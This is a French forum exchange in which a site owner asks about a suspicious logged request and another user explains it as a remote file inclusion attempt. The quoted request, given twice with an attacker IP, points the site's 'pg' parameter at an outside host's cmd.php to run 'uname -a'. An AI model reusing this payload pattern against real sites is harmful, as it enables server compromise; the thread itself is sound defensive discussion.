Bonjour,

Cette nuit nous avons eu une petite visite, avec quelqu'un qui a accédé sur notre site en tapant :

http://www.xxxx.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a

IP : 207.44.154.35 à 02:39:43

Est-ce pour tenter un passage en force sur les serveurs OVH ?

Quel était l'objet sinon ? :confused:

Hervé

VarioFlux écrivait :
Bonjour,

Cette nuit nous avons eu une petite visite, avec quelqu'un qui a accédé sur notre site en tapant :

http://www.educador.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a

IP : 207.44.154.35 à 02:39:43

Est-ce pour tenter un passage en force sur les serveurs OVH ?

Quel était l'objet sinon ? :confused:

Hervé
Il s'agissait de tenter d'exploiter une possible faille sur ton site. Il a tenté d'introduire dans la variable PG de ton script index.php la valeur http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
qui aurait exécuté, en local pour toi, vraisemblablement, un 'uname -a', histoire de connaître la version de ton kernle, pour savoir s'il est faillible à des failles connues.
Je te laisse chercher derrière, si ça t'intéresse, a qui appartient le domaine dpalone.hpg.br, mais je ne pense pas que ça mène loin...